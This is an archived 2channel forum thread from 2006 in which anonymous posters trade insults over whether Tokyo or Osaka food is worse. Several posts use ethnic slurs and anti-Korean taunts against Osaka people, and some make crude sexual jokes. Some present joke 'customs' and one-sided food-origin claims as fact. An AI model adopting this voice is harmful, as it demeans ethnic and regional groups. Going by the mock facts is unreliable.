5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

東京(頭狂)の食いもんはマズい!マズすぎる!!19

1 :もぐもぐ名無しさん:2006/12/22(金) 23:22:59
>>980踏んだ方次スレよろ。立てれない奴は絶対に踏むな。

前スレ
東京(頭狂)の食いもんはマズい!マズすぎる!!18
http://food6.2ch.net/test/read.cgi/food/1164882985/

過去スレ
東京(頭狂)の食いもんはマズい!マズすぎる!!17
http://food6.2ch.net/test/read.cgi/food/1164128145/
東京(頭狂)の食いもんはマズい!マズすぎる!!16
http://food6.2ch.net/test/read.cgi/food/1163137549/
東京(頭狂)の食いもんはマズい!マズすぎる!!15
http://food6.2ch.net/test/read.cgi/food/1161788396/
東京(頭狂)の食いもんはマズい!マズすぎる!!14
http://food6.2ch.net/test/read.cgi/food/1160487809/
東京(頭狂)の食いもんはマズい!マズすぎる!!13
http://food6.2ch.net/test/read.cgi/food/1159096406/
東京(頭狂)の食いもんはマズい!マズすぎる!!12
http://food6.2ch.net/test/read.cgi/food/1156662628/
東京(頭狂)の食いもんはマズい!マズすぎる!!11
http://food6.2ch.net/test/read.cgi/food/1155309150/
頭狂(東京)の食いもんはマズい!マズすぎる!10
http://food6.2ch.net/test/read.cgi/food/1153320317/
東京(頭狂)の食いもんはマズい!マズすぎる!!9
http://food6.2ch.net/test/read.cgi/food/1151399954


2 :もぐもぐ名無しさん:2006/12/22(金) 23:27:04
>>1乙です。

3 :もぐもぐ名無しさん:2006/12/22(金) 23:31:01
やっと立ったか。
>>1


4 :もぐもぐ名無しさん:2006/12/22(金) 23:36:25
大阪が本場の料理なんてなにもない。

お好み焼き → 広島産のオタフクソースを使っていい気なもんだ
たこやき  → 兵庫県明石市が発祥の地
うどん   → 香川の足下にも及ばず
おでん   → 自ら関東煮を名乗っている
押し寿司  → やっぱり京都でしょ
串カツ   → 実は東京が発祥の地
オムライス → 東京が発祥の地だが大阪に発祥の店を騙る恥知らずな店がある



5 :もぐもぐ名無しさん:2006/12/22(金) 23:37:07
【大阪グルメでの結論】
懐石=京都に完敗 瓢亭、たん熊、菊乃井・・大阪発祥の吉兆も全国チェーン
展開で優秀な料理人は皆、東京か、京都へ!分けとく山等東京の新興和食
勢力にも歯が立たず、大阪の和食全体が衰退の一途。
西洋料理、中華料理=フレンチ、イタリアン・・・全ての領域で東京に完敗
蕎麦、鰻、天ぷら、寿司=いうまでもなく東京(江戸前)に完敗
お好み焼き=広島に完敗、さらにお好み焼定食で全国民を唖然とさせる。
河豚=産地の下関に歯が立たず、新鮮な河豚は地元か東京へ
    大阪に出回るのは安値の低級品だけ
饂飩=讃岐に完敗、稲庭にも知名度で惨敗
洋食=オムライス発祥を詐称するも、質量ともに東京に完敗

 結局のこるのはたこ焼き等B級グルメ!そういえば牛乳やハム
ドーナツの不祥事も大阪!日本マックの創業者も大阪!
 カップラーメンも大阪の会社が発祥!
 見事なまでに日本の食文化の破壊を推進してるのが大阪人です!


6 :もぐもぐ名無しさん:2006/12/22(金) 23:38:52
ショウガの天ぷら食べて喜んでいる大阪人にグルメを語る資格はない
お好み焼きとご飯を一緒に食べて喜んでいる大阪人にグルメを語る資格はない
天ぷらにソースをかけて喜んでいる大阪人にグルメを語る資格はない
鰻の蒲焼きを焼き魚と勘違いしている大阪人にグルメを語る資格はない
腰のない麺と化調たっぷりの出汁の饂飩を食べて喜んでいる大阪人にグルメを語る資格はない
カレー粉まぶしたピラフもどきに卵をべっちょり混ぜて食べる大阪人にグルメを語る資格はない
オムライス発祥を勝手に捏造する大阪人にグルメを語る資格はない
串揚げお好み焼き肉・・・繊細な味付けを嫌う大阪人にグルメを語る資格はない
インスタントラーメンとハンバーガーで日本人の味覚を破壊し続けている大阪人は日本にはいらない


7 :もぐもぐ名無しさん:2006/12/23(土) 00:14:49
東京の居酒屋は最悪。
接客とサービス悪すぎ。

8 :もぐもぐ名無しさん:2006/12/23(土) 00:15:15
卵でべちょべちょの混ぜカレー

ソースとマヨネーズドボドボのたこ焼き

ソースにべっちょリつける串揚げ

                  異常いや 以上 大阪名物でした



9 :もぐもぐ名無しさん:2006/12/23(土) 00:16:26
前スレで出た意見
・東京の味は田舎ものにはわからない
・特に大阪人には上品な東京の味がなじめない
・店を選ぶ洞察力のない奴らは実社会でも負け組
・情報網が少なくマスコミに店選びを頼る香具師は東京では田舎もの扱い
・ファーストフードとコンビニ弁当、街の定食屋しか逝けない貧乏人は東京では
文化的な生活ができない
・地方人、特に関西人の単なるトウキョウコンプレックスは見苦しい
・現代グルメの大半は東京発祥で本場も東京。その現実を地方人、特に関西人
には受け入れがたいものがある。
・高級および鮮度の高いい食材は優先的に築地へ、優秀な料理人は東京(もしくは
外国)で修行する、この現実を地方、特に関西人は理解できない。
・大都市で、あらゆる面で競争の厳しい東京で生き残るのは大変である。
地方では店の数も少なく、競争もあまりないので、新陳代謝がほとんどない。
従って、その地方だけの井の中の蛙的な店が大手を振って街を席巻する、
特に、関西がいい例で、その証拠に関西の店が東京に出店を出しても殆ど
が閑古鳥が鳴いている。
・このスレで不味い不味いと連呼する粘着ヴァカは大阪人(阪在者)である。



10 :もぐもぐ名無しさん:2006/12/23(土) 00:16:51
東京名物ポコチン焼き

11 :もぐもぐ名無しさん:2006/12/23(土) 00:17:37
阪在者の特徴
1・部落とかチョンとか差別用語が大好き。でも、自分に矛先が向かってくるとムキになって直ぐ火病。
2・短時間のうちにみえみえの自作自演で一人悦に入る。
3・ヴォロヴォロに叩かれても何故か勝手に勝利宣言。
4・で、議論に負けると「頭狂」「頭狂」もしくは「もんじゃはゲロ」とか下品な戯言をグワバババと連投。
5・「東京の食い物は不味い」と言いながら具体例はゼロ。
6・日本全国から嫌われているのに大阪批判は東京の仕業と被害者意識だけは旺盛。
7・人に火病と必死にレスする自分が一番火病している件についてw
8・大阪を東京と言い換えただけの改変コピペがお得意w
9・このネタスレですら毎日稚拙な捏造ネタを連発するも瞬時に論破され、連日惨めに敗走を繰り返すw
10・恥ずかしいからか阪在者であることを隠蔽し、東京vs地方の構図に誘導するも、全国から賛同なく
あっというまに日本vs大阪の構図に自然となってしまいあっけなく敗走。
11・現在に自信が無いのでどこかの半島の奴らと同じくやたらと発祥に拘るが、肝心の発祥が捏造
(詐称)だらけな件についてw
12・味の話題が直ぐ値段の話題にすり替わる。



12 :もぐもぐ名無しさん:2006/12/23(土) 00:48:17
>>1 乙です.

13 :もぐもぐ名無しさん:2006/12/23(土) 00:51:30
正真正銘の本物スレだな。
最近インチキ偽物スレが多かったからな。


19まで来たか、感慨深いよ。

14 :もぐもぐ名無しさん:2006/12/23(土) 01:05:08
一昔前、東京の松屋でのこと。東京人が気持ち悪い話し方をしながら、ハムと目玉焼き定食納豆付きを食べていた。


その食べ方に唖然とした。ご飯の上にハム、目玉焼き、サラダ、おしんこを乗せてかき混ぜ、更に納豆、味噌汁まで投入。
それを掻き込むように食べていた。びっくりした。が、東京では普通の食べ方らしい。汚らしい…

15 :もぐもぐ名無しさん:2006/12/23(土) 01:15:15
古館伊知郎か?

16 :もぐもぐ名無しさん:2006/12/23(土) 01:22:04
本当に大阪人って捏造好きだね
さっき別スレで恥かいたばかりなのに懲りてないよw

17 ::2006/12/23(土) 01:26:46
カッペ君の感想文は見飽きました。

18 :もぐもぐ名無しさん:2006/12/23(土) 02:18:30
大阪では江戸時代には白菜があったらしいねw

19 :「江戸の五白」大阪人自爆編:2006/12/23(土) 08:22:47
>>18
これかw   ____
       / \  /\ 
.     / (ー)  (ー)\
    /   ⌒(__人__)⌒ \ <つか、お前、「白菜、大根、豆腐、鯛、白魚」だぞ?
    |      |r┬-|    |   白米とか入れてんじゃねぇよwwwwwwwwwww
     \     `ー'´   /
    ノ            \
  /´               ヽ
 |    l              \
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、.
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))


          ____
        /_ノ  ヽ、_\               <ちょww白米入ってるし江戸時代に白菜ねーよwwww
 ミ ミ ミ  o゚((●)) ((●))゚o      ミ ミ ミ
/⌒)⌒)⌒. ::::::⌒(__人__)⌒:::\   /⌒)⌒)⌒)  
| / / /     |r┬-|    | (⌒)/ / / //
| :::::::::::(⌒)    | |  |   /  ゝ  :::::::::::/
|     ノ     | |  |   \  /  )  /
ヽ    /     `ー'´      ヽ /    /
 |    |   l||l 从人 l||l      l||l 从人 l||l
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))

20 :もぐもぐ名無しさん:2006/12/23(土) 08:28:01
http://www.shin-emon.co.jp/tsukemono/hakusai.html
● 白菜の歴史

白菜の原産地は中国北部と言われていて、その分布は中国、朝鮮半島、日本などの東アジアが中心です。
日本では漬物、鍋物、煮物、和え物などにお馴染みで、冬の代表的な野菜になっていますが、日本での歴
史は案外浅く、全国に広まったのは、日清(1894〜1895)・日露(1904〜1905)の戦争で従軍した農村出身の
兵士が、大陸で食べておいしかったので持ち帰り、導入したためとのことです。各地に導入された種をもとに
、日本の風土に合ったものに改良され、本格的に栽培されるようになったのは大正期になってのことで、現在
では150以上の栽培品種があります。

21 :もぐもぐ名無しさん:2006/12/23(土) 08:46:30
単純に大阪人は悔しいんだよ。
政治も経済も現代文化もメディアも国際的重要度も何もかも東京に取られてしまって。
二番手はいつも一番に嫉妬するもんだ。



22 :もぐもぐ名無しさん:2006/12/23(土) 08:52:36
東京発で美味しいものって、東京バナナしか知らない。

23 :もぐもぐ名無しさん:2006/12/23(土) 08:55:08
関西国際空港は大赤字、市営地下鉄って・・・民鉄先進の関西で何故地下鉄だけ
市営が自慢?(゚Д゚)ハァ?読んでて虚しくなるね・・・・

このコピペ書いた馬鹿の顔が見たいw


24 :もぐもぐ名無しさん:2006/12/23(土) 08:56:07
大阪発の美味しい物って何も知らないw

25 :もぐもぐ名無しさん:2006/12/23(土) 08:59:00
大阪無職必死の防衛中www



26 :もぐもぐ名無しさん:2006/12/23(土) 09:52:10
東京ポコチンバナナ人が何か言ってます。

27 :もぐもぐ名無しさん:2006/12/23(土) 09:57:36
大阪無職朝から一人で大暴れw

28 ::2006/12/23(土) 10:09:32
今日も韓トンカッペは撃沈するんやな。

29 :もぐもぐ名無しさん:2006/12/23(土) 10:12:50
東京では、自分のポコチンにチョコ垂らしてチョコバナナにするらしい。
東京の食は下品ですな。

30 :もぐもぐ名無しさん:2006/12/23(土) 10:25:31
どう考えても大阪の飯は最悪
不味すぎる

31 ::2006/12/23(土) 10:25:56
馬鹿じゃねぇのコイツ?w

32 :もぐもぐ名無しさん:2006/12/23(土) 10:29:43
893が関西弁を使う確率100%



33 :もぐもぐ名無しさん:2006/12/23(土) 10:32:44
>>32広島弁は?

34 :もぐもぐ名無しさん:2006/12/23(土) 10:34:14
863 名前:もぐもぐ名無しさん[] 投稿日:2006/12/23(土) 10:26:51
ここは白菜(はくさい)と白菜(しろな)の違いがわかってないバ関東人のスクツでつねw

865 名前:もぐもぐ名無しさん[] 投稿日:2006/12/23(土) 10:30:23
>>863
白菜は白菜そのもの

>>863の言う代物はシロ菜またはシロナと表記します

またまた大阪人恥の上塗り



35 :もぐもぐ名無しさん:2006/12/23(土) 10:37:38


大阪って・・・・何かさ・・・全てが手遅れって感じ・・・・・・




36 :もぐもぐ名無しさん:2006/12/23(土) 11:54:55
韓トンカッペはイクのが早いのね。

37 :もぐもぐ名無しさん:2006/12/23(土) 12:14:31
韓トン君では満足できないの。
サヨウナラ

38 :もぐもぐ名無しさん:2006/12/23(土) 13:10:00
 思 人 暗 そ ま   |                 |     ご
 わ 生 く  ん さ.  |         ,. -──- 、、|      め
 な  を て な か   |        // ̄:::::::::::::::::::`l      ん
 か 送 さ み .大  |    /::::::::::::::::::::::::::‐、:`ヾ::\     :
 っ  っ び じ  阪   |   /:::::::::::/::::::::::::::::::::::\:::`:::::\  :
 た て  し め 無 .  |  /:::::::::/|:::::::;::::ヾ、::::::::::::::\:::::::::::!┐ , -─'
 か る い で  職   |   |::::::::/  |:::::::|\:::ヽヽ:::::::::::::\::::::| レ'′
 ら  と      が   |  |::::::| ,. -ヘ::::|  ヽ:::|‐ヽヽ:::::::::|:ヽ:|
 :  は         /   |::/レ',ニミ ヽl   ヾ!, 〒ミ||:::::|::::::|
          __/`   |n:|   |::::j     ′|::::j ヾ|:|Fl::|
>      <         { |:| ` ̄´     ` ̄´  |::「 |:|
 : 浮 あ   \       ヽl:!     ,       U  |::レ'::|
 : か た  .   |   /!    |:ヽ「Y^!|  ___     ,ィl/|:::::トィ!l
 : れ し     |  (/     _ノ:n:| | | | `__`  , イ从|:トゝ-'´
    ち      |   /!  `ー| |j l  レ'/-‐'´  |: :〈
   ゃ       |  (/    _」′   r'、___./: : :|ー-- 、_
   っ      |      /: : |     ハ: : : /: : : :./: : : : : : :`ヽ、
    て      |     /: :,:ィ'´ヽ__r': : ー‐': : : : /: : : : : : : : : : :ヽ
             /    /:/: :|: : : : : :人: : : : : : :/: : : : : : : : : : : : /: :l
\______/    /:/: : : :`ー: : /: : :`:‐:‐:‐'´: : : : : : : : :ヽ: : : /: : :|
            /:/: : : : : : : : : /: : : : ゝ-': :/: : : : : : : ヽ:\/: : : :.|


39 :もぐもぐ名無しさん:2006/12/23(土) 13:30:39
>>14俺も見た.
東京人気持ち悪すぎ。

40 :もぐもぐ名無しさん:2006/12/23(土) 14:04:21
>>21
今や二番手ですらない罠

41 :もぐもぐ名無しさん:2006/12/23(土) 14:05:34
>>24
たしかに大阪の朝鮮料理は本場の味だ。
http://food6.2ch.net/test/read.cgi/food/1166039089/

42 :もぐもぐ名無しさん:2006/12/23(土) 14:32:25
うぜえなあ。大阪。お前らなんだがんだで東京になりたいんだろ?
スタイリッシュになりたいんだろ?正直に言えや。
ま、キモイから無理。「 プ チ 東 京 」目指して
頑張って。



43 :もぐもぐ名無しさん:2006/12/23(土) 14:33:24
>>42
お前のような田舎もんには、なりたくないわ

44 :もぐもぐ名無しさん:2006/12/23(土) 14:35:55

東京 VS 大阪
    犯罪件数 人口   発生率  発生件数
東京 291,371 12,064,101 0.02415 41.40人に一件
大阪 252,367 8,805,081 0.02866 34.89人に一件←大阪ダントツ一位

大阪って犯罪者の巣窟だね!ちょっとは東京や神奈川を見習ったら!
      犯罪件数 人口   発生率  発生件数
神奈川 169,968 8,489,974 0.02002 49.95人に一件
京都   54,078 2,644,391 0.02045 48.90人に一件 



45 :もぐもぐ名無しさん:2006/12/23(土) 14:40:40
>>44
無意味な、コピペする暇があるなら
田舎に帰省する前に、日頃世話になってるボロアパートの掃除くらいしろ。

46 :もぐもぐ名無しさん:2006/12/23(土) 15:01:41
再度ご提供

http://homepage1.nifty.com/forty-sixer/2000nen.htm
↑大阪人は本当に朝鮮人である。



47 :もぐもぐ名無しさん:2006/12/23(土) 15:18:02
>>42かっぺ?

48 :42:2006/12/23(土) 15:21:27
カッペ。

49 :もぐもぐ名無しさん:2006/12/23(土) 15:22:25
>>42
カッペ

50 :もぐもぐ名無しさん:2006/12/23(土) 15:22:39
ケンシロウ=東京
関西とは一線を隔て独自の江戸文化を形成、色んな流派も取り入れ大きく成長
今では関西全体に匹敵する実力に
京都=ラオウ
自他ともに認める格式と伝統は他の追随を許さない
日本文化の重鎮として確たる存在感をしめす
札幌=ジュウザ
天賦の才(天然の素材)に恵まれた大都会、だがまだ発展の余地を残す
神奈川=レイ
東京に連れ添う為目立たないがかなりの実力派
洋食、中華に加え古都鎌倉を擁する
石川=シン
百万石が生んだ絢爛たる加賀料理と古都金沢は端睨出来ざる勢力
文化、都市の品位は地力充分
兵庫=リュウガ
日本文化の強い関西陣営において異彩を放つ神戸の独特の異国情緒に加え国宝の姫路城も持つ
福岡=サウザー
西南の雄、独自の九州文化の中心的存在
高い完成度を誇る食文化は部分的ではあるが関西、東京を陵駕する
長崎=ユダ
特異な色彩を持つ変わり種の都市
しっぽく、ちゃんぽん、皿うどんと他地域も羨む個性派

大阪=ジャギ
東京を敵視し歴史が10年古いだけが依りどころだが既に実力で遥かに及ばない
そのため京都の権威を借りたりセコい捏造をしたりと見苦しい手を使う
毎回東京に実力差を見せつけられて惨敗

51 :もぐもぐ名無しさん:2006/12/23(土) 15:29:39
ワロタよ
大阪人の脳内では
京都>大阪>>>>東京だからなw
「兄より優れた弟はいねぇ〜!」なんだろうな、現実は違うけどw

52 :もぐもぐ名無しさん:2006/12/23(土) 15:41:44
42で図星つかれた大阪人が発狂中w

53 :もぐもぐ名無しさん:2006/12/23(土) 16:18:41
>>51
なるほど
中国>朝鮮>>>>日本ってわけか
「兄であるウリの前を歩くのは許せないニダ!」ってな、根拠はないけどw


54 :もぐもぐ名無しさん:2006/12/23(土) 21:47:05
>>50その例え方オタク過ぎだろwww さすが頭狂人だなwww

55 :もぐもぐ名無しさん:2006/12/23(土) 22:36:00
大阪はむしろアミバw

56 :もぐもぐ名無しさん:2006/12/23(土) 22:43:03
なんだこのリアル中二病患者共は

57 ::2006/12/23(土) 22:44:43
アホ

58 :もぐもぐ名無しさん:2006/12/23(土) 22:49:14
>>57
お前やここの連中がまともだと言うならそれでかまわんよ

59 ::2006/12/23(土) 23:06:53
ホロン部

60 :もぐもぐ名無しさん:2006/12/23(土) 23:09:42
>>57>>59
大阪無職

61 ::2006/12/23(土) 23:19:22
アルツ君はもう寝たまえ。

62 :もぐもぐ名無しさん:2006/12/24(日) 00:07:13
矢印厨が一番低脳だな

63 :もぐもぐ名無しさん:2006/12/24(日) 02:11:19
テメエラ御託捻ってるんじゃねーよ。
東京が嫌いなら独立しろよ関西人。

むしろ天皇京都に返すから静岡あたりで日本分けようぜ。
いちいち東京に噛み付いてウぜーんだよ。

東京の食いもんがまずければ食わなければ良いだけ。
つか東京来るな。東海道新幹線と東海道本線廃車にしろ。関西人。


64 :もぐもぐ名無しさん:2006/12/24(日) 02:47:31
東京みたいな「労働するだけの場所」になんか住みたくないわ。
マズいメシに高い金払わされ、ハリボテのスパに高い金払わされ、
満員電車に不条理にも揺られ、高いがせっまい家に住まわされ・・・・。
地方の食材も数日遅れで入ってきてるのに手間賃上乗せされてカワイソス。

地方では、そこそこの家やマンション買って、休日は土いじったり、
家族で田舎へドライブ、近隣の旅館やホテルでゆったり温泉。
取れたての魚や野菜で舌堤み。

東京に住むメリットは無いよ。
いろいろな店があるから楽しめる?
全ての店廻れるほどの金と暇あるのか?




65 :もぐもぐ名無しさん:2006/12/24(日) 03:06:00
東京は田舎者の集まり

66 :もぐもぐ名無しさん:2006/12/24(日) 07:03:47
>>64
絵に描いたような幼稚な印象論だね

67 :もぐもぐ名無しさん:2006/12/24(日) 07:12:36
すみません、教えてください。
道頓堀川を市がさらったら自転車が300台出てきましたよね。
あれって何ですか?なんで自転車がそんなに沈んでるんですか?
犬阪では「自転車流し」とかが風習としてあるんですか?



68 :もぐもぐ名無しさん:2006/12/24(日) 07:29:24
ない

東京とは違うっぽい

69 :もぐもぐ名無しさん:2006/12/24(日) 07:33:00
大阪では盗んだ自転車が役目を終えると感謝の念と冥福を祈って川へ
流す風習があります。
いわゆる「自転車流し」です。
自転車を川に流すことで大自然に還し、また新たに駅前で新しい自転車
になって帰ってくると大阪の土着信仰では信じられているのです。

70 :もぐもぐ名無しさん:2006/12/24(日) 07:37:33
>>69
ワロタ

71 :もぐもぐ名無しさん:2006/12/24(日) 07:39:43
そもそも「自転車流し」という行事は、
昭和初期、浅草の商売人が役目を終えた商売用自転車を隅田川に流し、
長年の感謝の念をもって供養したことが始まりです。
だれもがオート三輪など買えなかった時代に、その代用として活躍をしてくれた自転車に
思いをこめて、毎年12月に行われます。
大阪の道頓堀だけではなく、福岡の那珂川などにも伝わっているようです。

72 :もぐもぐ名無しさん:2006/12/24(日) 09:42:41
>>64
さすがニートの考えることはひと味違うなw

73 :もぐもぐ名無しさん:2006/12/24(日) 10:19:05
>>64は東京で生計を立てたことがある人の
ごく一般的な感想だよ。
東京生まれや学生で上京してきた人にはわかりにくいだろうけど。

74 :もぐもぐ名無しさん:2006/12/24(日) 10:40:27
東京に住む価値は人それぞれだし
航空や陸上輸送が発達して青果は翌日には入荷
魚介類は当日には食べられるご時世に数日遅れだの
悪意むき出しの文に完全に同意を求められてもなー

75 :もぐもぐ名無しさん:2006/12/24(日) 10:57:21
大阪って定食屋みたいのが安くて美味いらしいね。
東京は世界の食物が揃ってるから一見美味そうに見えるが、
その実東京ならではの美味いものって何だろう。どう考えても思いつかない。
ちなみにオレは東京人。


76 :もぐもぐ名無しさん:2006/12/24(日) 10:59:34
ttp://www.yakiniquest.com/000322.php
ttp://www.yakiniquest.com/000328.php


東京人も舌を巻く大阪の焼肉

77 :もぐもぐ名無しさん:2006/12/24(日) 11:15:56
>>75
常に、冷静な判断を出来る人なんやね。

78 :もぐもぐ名無しさん:2006/12/24(日) 12:17:53
>>75
「東京ならでは」のものなんて、考えたこともなかった。

逆に考えれば、いろんなところの人が集まるところだから、いろんなところの旨いもんが食える、
ってことだね。



79 :もぐもぐ名無しさん:2006/12/24(日) 12:26:39
>>76
数スレにも渡ってしつこくしつこく個人のブログを貼り続けてるけど、何が言いたいの?
何ヶ月も一生懸命ググって、その個人ブログしかソースが見つからないの?
つうかソースは大好きなのにね(^o^)


80 :もぐもぐ名無しさん:2006/12/24(日) 14:34:19
>>79
「焼肉に魅せられた者たちの終わりなき探求の物語」
ttp://www.yakiniquest.com/


はっきりと意図を持った素晴らしいサイトだと思う。
ブログなどではない。

81 :もぐもぐ名無しさん:2006/12/24(日) 15:21:33
>>80
そのサイト見てきたけど、リスペクト店はR1からR3まで全部東京じゃん


82 :もぐもぐ名無しさん:2006/12/24(日) 18:10:29
>>81
> そのサイト見てきたけど、リスペクト店はR1からR3まで全部東京じゃん

はっきりと意図を持った素晴らしいサイトだと思うw



83 :もぐもぐ名無しさん:2006/12/24(日) 18:26:01
じゃあこれからも貼りまくってOKだなw

84 :もぐもぐ名無しさん:2006/12/24(日) 18:32:51
東京民の考える幸せとは優雅とか快適などとは無縁の世界。
3時間4時間並んでやっと食ったラーメンを「ああ、おいしかったなぁ」という
極めて小心者的な楽しみ方。テレビで見たモノを食ったのが嬉しくてしょうがない。

テレビや雑誌で紹介されるとすぐブランド化して崇拝し猿マネするのが好きな小市民。

トンキンマスコミが福岡を叩けば同じように叩き、大阪を嫌えば同じように嫌う
また、トンキンテレビが韓流を捏造すれば東京民は数千人規模で祖国にまで押し寄せ「様」まで付けて崇拝する。

日本中から馬鹿にされても「マスコミの犬」として一生を終えます。

85 :もぐもぐ名無しさん:2006/12/24(日) 18:35:56
>>84
> 3時間4時間並んでやっと食ったラーメンを「ああ、おいしかったなぁ」という

また捏造かw
そんなに待たされる店なんか無いんだが
大変だな田舎者の脳内東京はw

86 :もぐもぐ名無しさん:2006/12/24(日) 18:43:06
>>84
> テレビや雑誌で紹介されるとすぐブランド化して崇拝し猿マネするのが好きな小市民。

正にテレビや雑誌そのままのネタ知識だなw

87 :もぐもぐ名無しさん:2006/12/24(日) 18:45:23
田舎者の脳内東京

人人人人人人人人人人人人
人人人人人人人人人人人人
人人人池袋人人上野人人人
人人新宿人人人人東京人人
人人人渋谷人人秋葉原人人
人人人人人品川人人人人人
人人人人人人人人人人人人
人人人人人人人人人人人人


88 :もぐもぐ名無しさん:2006/12/24(日) 18:57:58
東京メディアで報じた東京の飲食店が大概マズい件7
http://food6.2ch.net/test/read.cgi/gurume/1166953173/l50

89 :もぐもぐ名無しさん:2006/12/24(日) 19:14:34
>>88
食べ物板でボロカスに叩かれた阪在者がグルメ板に逃亡wwwwww

90 :もぐもぐ名無しさん:2006/12/24(日) 20:29:17
本当に大阪人はモラルがないね

91 :もぐもぐ名無しさん:2006/12/24(日) 20:58:39
銀座で寿司食った経験のない東京人が、
銀座を自慢します
今日も八王子から書き込んでおります

92 :もぐもぐ名無しさん:2006/12/24(日) 21:02:01
>>85
一時間待ちで食うのが遅いと叱られる店ならあるな

93 :もぐもぐ名無しさん:2006/12/24(日) 21:09:03
佐野実かい?

94 :もぐもぐ名無しさん:2006/12/24(日) 21:13:05
仕事以外の事情で東京住んでる人ほとんどおらんでしょ
働かせられてるんだから、そこまででかい態度とんなよ
恥ずかしいゾ

95 :もぐもぐ名無しさん:2006/12/24(日) 21:54:34
東京を好む人間も居れば田舎を好む人間も居ることに考えが及ばないんだね
恥ずかしいゾ

96 ::2006/12/24(日) 21:59:50
カッペ君はオムツしておねんねしろや。

97 :もぐもぐ名無しさん:2006/12/25(月) 00:13:10
だしの歴史

日本では、鰹節や昆布からその旨味成分を煮出して、その味を賞味したり、だし汁で
他の素材を味付けし旨味づけをする食文化が発達してきました。
北海道で採れる昆布が、日本海を通って精進料理が発達していた京都に運ばれる
ようになるのは、室町時代です。江戸時代には、天下の台所とよばれた大阪で主に取引
されるようになり、次第に、西日本全体へと広まっていきます。
一方、関東に昆布が伝わるのはもっと後になってから。そのため、関東は関西に比べて
未だに昆布の消費量が少ない地域となっています。
ttp://www.shunmaga.jp/zukan/nousankakouhin/dashitsuyu/dashitsuyu.htm


料理後進国 関東w

98 :もぐもぐ名無しさん:2006/12/25(月) 00:13:24
>東京を好む人間も居れば田舎を好む人間も居ることに考えが及ばないんだね
東京人にまず言えwwwwwwwwww

99 :もぐもぐ名無しさん:2006/12/25(月) 00:38:00
東京で売ってるトーストって、なんであんなに薄々なの?w
8枚切りとかね。
大阪では5枚切りくらいの分厚いのが主流なのに。
いくらなんでも東京セコすぎw

100 :もぐもぐ名無しさん:2006/12/25(月) 01:00:50
>>99
おー、それは俺も驚いた。サンドイッチ用にしても薄すぎるしなんに使うんだあれ?
カナッペ専用とかか?煽りじゃなく知りたい、教えてくれ東京の人。

101 :もぐもぐ名無しさん:2006/12/25(月) 01:13:09
東京は大阪と違って全てが上品ですからwww

102 :もぐもぐ名無しさん:2006/12/25(月) 01:17:02
>>100
千葉だけど(´・ω・`)
普通は偶数で切り出すからでしょ?
分厚くて奇数じゃ、家族だと割り切れないし、子供なら余すでしょ。
薄いのが嫌なら、丸ごと一斤買って自分で切りなよ。

103 :もぐもぐ名無しさん:2006/12/25(月) 01:29:33
>>101
君の感覚は、田舎者丸出し。

104 :もぐもぐ名無しさん:2006/12/25(月) 01:44:33
デイリーでバイトしてたけど6、8、12だった希ガス
うろ覚えでスマソ

105 :もぐもぐ名無しさん:2006/12/25(月) 01:48:39
>>102
お父さんが二枚、子供が一枚だと奇数だけど。
家族3人が一枚づつ食えば3枚。
頭悪いね君。


106 :もぐもぐ名無しさん:2006/12/25(月) 01:52:21
関西のうどんは90gか95gの小麦粉に対して5gから10g入れるから
つゆが薄くても結果的に関東と全く同じになる。
http://allabout.co.jp/gourmet/udon/closeup/CU20020902matu/
なぜかつゆが黒い大阪きつねうどん発祥の店
http://www.iokikai.or.jp/r.teutiudon.htm
関西のうどんは塩辛い
2麺の作り方
 @食塩水濃度と量(これが大切。必ず計量して下さい。)
季節 中力粉g 食塩濃度% 食塩水g
冬  100      6     46〜50
春秋 100      8     44〜48
夏   100     10    42〜46

塩辛い関西のうどんのポイント

@関西には手打ちうどんがほとんどなく、あるとすれば讃岐になる
A大阪うどんで有名な店をさがすと讃岐に行き着く
Bつゆ以外の特徴が無い
Cつゆも何故か江戸後期に使われ始めたかつお出汁がベースで江戸の文化に強い影響を受けている(きつねうどん)
Dかつお節は江戸時代前期までは全国的に食用で、特に関西地域には出汁を取る習慣が無い。
E関西のかつお節はあら節が支流で、花鰹などの習慣が無かった
F江戸時代には土佐からかつお節を仕入れていたのが関東地方に限られていた


107 :もぐもぐ名無しさん:2006/12/25(月) 01:54:02
きつねうどんの話

「きつねうどん」は明治時代、大阪に開業したうどん屋さんが「いなり寿司」を参考にして考案
したと言われています。しょう油とみりんで煮含めて、ふっくらやわらかく仕上げた大きな油揚
げがうどんにのっかります。讃岐うどんなどに比べるとやわらかめの麺、甘辛い油揚げ、そし
て関西ならではのつゆが絶妙な取り合わせ。特に、鰹節や鯖節、昆布などのだしが利いたつ
ゆは、最後まで飲み干したくなる味です。うまい、安い、早い──その合理的なところがいか
にも大阪らしく、大阪を訪れたらとりあえず一杯、という方も少なくないでしょう。
ところで大阪で「きつね」と言えば、それは「きつねうどん」のこと。関東で言う「きつねそば」(
油揚げ入りのそば)は、大阪では「たぬき」と呼ぶことが多いようです。揚げ玉(天かす)が入
る関東の「たぬきうどん」は、大阪では「ハイカラうどん」と言うことがありますが、そもそも天
かすは無料サービスのお店が多いので、「すうどん(かけうどん)」ということで事足ります。
一方、京都で「たぬき」と言うと、刻んだ油揚げ入りのあんかけうどんを指すことが多く、刻ん
だ油揚げが入ったうどんは、大阪では「きざみうどん」‥‥なかなかややこしい話です。

「きつねうどん」は明治時代、大阪に開業したうどん屋さんが「いなり寿司」を参考にして考案
したと言われています。

これが伝統的な食べ物なんでしょうか???たかだか明治時代に作られただけなのに


108 :もぐもぐ名無しさん:2006/12/25(月) 01:55:11
http://www.ninben.co.jp/004katuo/10rekishi/index.html
4.土佐余市

江戸の後期に、紀州印南浦の住人で、土佐与市という鰹節職人が、安房(1781)・伊豆(1801
)の両国に改良土佐節を紹介しました。これを熱心に取り入れた伊豆では、土佐節の製法を
見習った上で、カビ付けの回数を2〜3回以上行い、脂肪や水分を節の中から吸い出す製法
をあみだしました。「伊豆節」の誕生です。その後、土佐節とならび、伊豆節は全国的に高い
評価を受けることとなりました。

「焼津節」は、直接与市から技法を授かっていませんが、その起源は伊豆の改良節ですので
、与市によって伝えられたといえます。 その後、改良節は全国に広められていくことになりま
す。 後年、与市は望郷の念禁じがたく、故郷の紀州印南に立ち返りましたが、秘法を他国へ
